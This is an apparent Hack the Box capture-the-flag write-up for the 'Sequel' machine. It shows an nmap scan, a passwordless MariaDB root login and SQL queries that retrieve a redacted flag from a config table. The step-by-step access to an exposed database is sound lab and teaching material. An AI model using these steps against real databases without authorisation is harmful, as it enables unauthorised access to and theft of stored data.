Sequel on Hack the Box Write-up
By funcsec
- 4 minutes read - 645 wordsQuick little mysql
vulnerability.
A lession in misconfiguration.
Executive Summary
The target machine had an open database port which also had no password to access the service. This was a Security Misconfiguration.
Methodology
To begin, the target machine was enumerated using nmap
.
The output of nmap
will show the open ports and potentially try to identify services of a target machine.
nmap -sV -sC $ip
The variable $ip
was substituted for the ip address of the target machine.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-18 23:10 EST
Nmap scan report for 10.129.95.232
Host is up (0.075s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
3306/tcp open mysql?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 336
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolOld, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsCompression, LongColumnFlag, SupportsLoadDataLocal, ODBCClient, Speaks41ProtocolNew, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: */KkY^K>5,|OT8\E'2d"
|_ Auth Plugin Name: mysql_native_password
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.29 seconds
The output of nmap
indicated that there was an open mysql
port, specifically running MariaDB version 10.3.27.
A common miss configuration for mysql
is too fail to configure the root password for the mysql root
user.
This is different from the system root user and can have a different password or no password at all.
Best practice is not to expose database ports to the open internet, only machines that require access to the database.
The target machine may not have a root mysql
password configured.
IP=$ip
PORT=3306
mysql -h "$IP" -P "$PORT" -u root -p
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 344
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Logging in with the root user with no password was successful.
This offer and full control over the target machine’s mysql
service.
The server distribution of Debian 10 (buster) was present in the output from the mysql
service.
The mysql
databases were then searched for interesting data.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.075 sec)
The only unique database was htb
, the rest of them are standard to mysql
.
It was likely that the flag data was contained in that database.
MariaDB [(none)]> use htb;
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.100 sec)
A config
table is often where other important information pertaining to an application.
A users
table might be helpful in collecting user credentials or social engineering materials.
A flag might be in either, but config
was accessed first.
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | [[ REDACTED ]] |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.073 sec)
The flag was in the config
table and the flag value was flag{[[ REDACTED ]]}
.
One simple vulnerability, and a quick turnaround.
Good to put in a couple SQL
queries every now and again.